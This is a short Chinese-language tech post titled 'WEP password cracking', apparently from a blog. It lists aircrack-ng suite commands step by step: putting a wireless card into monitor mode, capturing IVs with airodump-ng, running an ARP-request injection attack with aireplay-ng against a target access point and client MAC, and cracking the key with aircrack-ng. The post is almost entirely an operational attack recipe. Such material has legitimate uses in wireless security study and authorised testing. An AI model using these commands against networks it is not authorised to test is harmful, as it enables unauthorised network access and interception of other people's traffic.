wep密码破解
確認網卡:
ifconfig -a //查看網卡
//如未識別無線網卡,ifconfig wlan0 up 加載網卡驅動
iwconfig //查看無線網卡
激活網卡監聽模式:
airmon-ng start wlan0//監聽模式下適配器名稱會變為mon0
探測基本信息:
airodump-ng mon0//獲取工作頻道
收集破解密碼所需的ivs:
airodump-ng --ivs -w longas -c 6 wlan0
//--ivs 過濾模式
//-c 6 工作頻道為6
//-w longas 保存到longas-*.ivs中
ArpRequest注入攻擊加速報文產生
aireplay-ng -3 -b AP的mac -h 客戶端的mac mon0
//-3 ArpRequesr注入攻擊模式
//-b 后跟Ap的mac地址
//-h 后跟客戶端的mac地址
破解wep
aircrack-ng 捕獲的ivs文件
重啟網卡
sudo ifconfig wlan0mon down
總結
- 上一篇: 抽奖随机滚动_老板让我做年会抽奖系统,我
- 下一篇: easyboot-code-genera